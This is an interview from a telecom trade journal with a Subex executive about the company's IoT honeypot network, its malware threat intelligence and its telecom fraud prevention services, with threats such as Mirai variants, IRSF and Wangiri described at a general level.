© 2022 Black Swan Telecom Journal | • | protecting and growing a robust communications business | • a service of |
Email a colleague |
November 2019
Is achieving great business or career success just luck — being at the right place at the right time? Or can you actually do something to greatly increase your odds of coming out a winner?
Well, according to Scott Adams, the creator/cartoonist of the famous Dilbert comic (and former telecom exec at PacBell), a person can truly “manage his luck” through wise positioning:
“Let’s say your goal is to be hit by lightning. Well, people would say, ‘It’s very unusual to be hit by lightning, so it’s luck and there’s nothing you can do about it.’
But actually there are some things you can do. You could go outdoors. That would increase your odds. Better yet, you can go outdoors when it’s raining in a place that has thunderstorms.
And if that’s not enough, you could pack up your belongings, move to the top of a mountain that has frequent thunderstorms, then build a network of connected lightning rods, and camp out with your hand holding a cable attached to those rods.
For sure, you’re going to get hit by some lightning!“ Scott Adams
Now in my line of work — as independent telecom analyst — I find I can get more business by interviewing more experts for Black Swan stories. For me, that’s the equivalent of holding onto some lightning rods, for I can demonstrate my value to people who may need my market research services.
Likewise, analytics-veteran firm Subex has come up with an innovative way to position itself as an expert vendor of IoT security monitoring and protection services. I recently spoke with Kiran Zachariah, Subex’s VP of IoT Business Solutions, who explains how Subex is attracting clients as they develop a rich portfolio of security/fraud prevention solutions and services.
Dan Baker, Editor, Black Swan Telecom Journal: Kiran, let’s get right into your biggest area of focus: IoT Security. How is Subex involved and building your business there? |
Kiran Zachariah: Dan, the way we are build our expertise is to research IoT security problems in a very deep way. Subex now runs the world’s largest network of IoT honey pots. And those honey pots drive our analysis and research into global IoT security threats. We then use the threat intelligence we compile to protect our customer’s IoT networks from similar attacks. Today we protect a total of 10.5 million IoT devices.
Our honeypots are actually scattered across 65 locations around the world. And they sit and wait to be attacked — these days at the rate of 3.5 million attacks per day. We’ve also organized our intelligence to capture data as it relates to 400 different device architectures with a total of about 4,000 unique devices across all our honeypots.
The biggest challenge in IoT security is keeping track of the widely diverse threats. IoT attacks are substantially different from IT attacks. For example, in the IoT world, quite a bit of the malware is open source. In all, we identify roughly 150 new strains of malware every day.
The IoT devices themselves start with simple SIP phones, sensors, routers, and go all the way up to what we call OT devices (Operational Technology) that actually sit on an industrial shop floor. Another complication: lots of IoT devices connect back to legacy infrastructure to synch with shop floor technology that hasn’t changed in 20 years. For instance, lots of the shop floors use Windows 7 and other legacy OSs.
We monitor various types of communication protocols, too. You have CoAP and AMCP. Also there are transport protocols like LoRa, Sigfox, LPWAN, and NB IoT. And the IoT world has its own transport protocols such as Modbus, BACnet, and IEC protocols. So many to keep track of.
Now, the diversity of IoT attacks is so large and complex that it requires a dedicated effort. It’s not practical for an enterprise to get into the business of monitoring these threats. So that’s where Subex comes in. We aim to pick up almost every attack out there, analyze what we detect, and protect customers.
What sort of data are you collecting from the honey pots? |
Well, the first important thing to collect is the actual malware payload that the bot is trying to download to the IoT device. We also monitor the way they do their reconnaissance from a command and control center. And we ask key questions like: how are the IP addresses of those command and control centers changing? What types of architectures are they trying to attack? What type of devices are they targeting?
Tracking the particular strain of malware is also crucial. For example, Mirai was one of the biggest, most famous IoT malware. And because Mirai was open source, people were constantly downloading Mirai, changing a few things, then recompiling and launching a new botnet with a different strain of malware.
So we get to know all of those variants and increasingly there are “smart variants” which merge multiple malware source codes to create super-smart malware.
Another important goal of our research is to detect the bit patterns or “signatures”. Because we maintain a blacklist of IP addresses, we know where each of them are coming from. Then as the bot tries to download its payload into the IoT device, we detect the bit pattern flow (or signature flow) through the pipe and stop the session in near-real-time so that the device does not get infected.
So how secure is IoT today? Are security threats under control or are there some potential negative black swans on the horizon? |
I don’t think you can put the problem in black and white terms. Look at telecom IRSF fraud. Almost every operator accepts the fact that a certain amount of toll fraud will be successful. The point is to limit financial losses to an acceptable level.
The same goes for IoT cybersecurity. Clearly 99% of the attacks we see on the honey pots are familiar to us or are variations of past attacks. But in those 1% of new attacks we often see clever, purpose-driven malware. And that’s quite scary.
For example, an alleged Russian team named Fancy Bear successfully ran hacking attacks on printers and IoT devices to infiltrate enterprise networks.
But while Fancy Bear-like attacks get people’s attention, I don’t feel it’s holding back the IoT market. Today we see considerable investing in IoT, and people are falling back on service providers like Subex who provide that essential security.
Typically, we get involved early on in an IoT project. We become part of our customer’s whole development and deployment process. And our key role is to continually perform vulnerability assessments and penetration tests of the client’s devices.
We also do the monitoring of the whole deployment for the long-term through multiple layers of protection and monitoring methods.
While the threats are very real and break-ins still occur, enterprises who segment their network and perform basic network hygiene can successfully manage the IoT security problem. Even if your device is hacked, you can prevent substantial attack on your old networks by making sure the attack does not spread or infiltrate to the rest of your enterprise.
In what sectors of the IoT Security market is Subex active? |
In a number of areas. IoT security for the oil and gas industry is one. There we monitor and protect smart meters, the pumps, and offshore rigs, many of which have SCADA interfaces. We are doing government projects that secure smart cities.
And, of course, we do lots of work with telcos. We’ve made public announcements with Telefonica and a few other telcos about securing their IoT devices from the telco perspective. So, the telco can today secure IoT devices or devices and charge their customer a certain price above their basic connectivity price and monetize our solution that way.
Another key market for us is the auto industry where we are involved in connected cars and autonomous driving. And automotive is an interesting one for us because we serve two different sides of communication security: telco networks and the car-resident OEM comms buses.
So on the telco side we are preventing and monitoring network-based attacks. But there are many other networks we need to secure. For instance, Android and IoS Hyperplay directly connect to comms buses such as CAN bus, Modbus, and FlexBus to handle electronics inside the car.
Take the ABS (Automated Braking System) in a car. ABS is a safety feature that ensures when you brake on ice or snow, the tires rotate at the same speed so your car doesn’t skid off the road and go out of control. All of this is done electronically. But imagine the security and safety risks if someone could remotely control the ABS in a car. So some of our IoT deployments in the connected car space are directly helping the OEMs to secure such car-internal subsystems.
Sounds like you’re rapidly building an expertise in IoT. But I’m also reminded that Subex has a long pedigree in telecom fraud management. What’s happening on that front? |
We have actually made big investments in telecom fraud in an initiative we call Digital Fraud Prevention. As you know, our prior method was to pick up technical fraud using Call Detail Records (CDRs). But our new digital solutions are a great improvement: they detect in real-time by looking at the signaling parameters in the network.
The whole idea is to look at, say, the SIP Invite message or a spoof CLI number on the Invite message, and that allows us to go to the SBC and tear down the fraudulent voice call before it actually occurs.
The SIP invite is only one signaling type. We also look at SS7, Diameter, and other voice signaling. Our solution is built to protect voice, SMS, and data services. We’ve created new modules in SMS and on the Data side, and are also working on an IPTV module. So all these will enable new fraud control capabilities for customers beyond what they could do by looking merely at CDRs.
Our Digital Fraud Prevention program is great for many types of technical fraud — CLI spoofing, IRSF, PBX hacking, WanGiri, data fraud — collectively these are the fastest growing types of fraud in the telco network.
At one large operator, we deployed our Digital Fraud Protection and achieved a 48 hour reduction in IRSF fraud run-time for them. With Wangiri, the challenge is two-fold: the fraudster will spoof the phone number on the CLI but also vary the IP address from where the calls are being made. So, even if you try to shut it down, tomorrow they will switch to another phone number and come in through another IP address.
A top fraud problem in developing countries is something called www.0.facebook.com fraud. Facebook subsidizes all traffic to their website in developing countries. So when the user surfs to Facebook, the telco will not charge the user because Facebook bears that cost.
Well, as you can imagine, “Free Internet” is a magnet for fraudsters. What they often do is setup rogue DNS queries that enable data downloads invisible to the underlying provider and therefore never charged to Facebook. Here, Subex provides deep packet inspection on particular interfaces, such as the Gn interface, where we look for header mismatches to detect the fraud.
Kiran, when you add up your fraud and IoT security programs, you’ve created a nice virtuous circle of software and managed services work for Subex. And adding the research angle through your honey pot network is a great way to both gain expertise and win clients. |
Thanks, Dan. The other thing we like is we’re creating research assets and expertise that are cross-industry. In IoT security, we can not only serve telecom, but also steadily increase our ability to serve enterprises in other industries, too.
And it’s not a one way street either. The expertise tends to loop back around and benefit the telcos. What we do is take the use cases we’ve developed in very specific IoT scenarios and enable the telcos to bundle that expertise and resell it with their connectivity to serve enterprise customers. Quite many of them are doing that today.
Copyright 2019 Black Swan Telecom Journal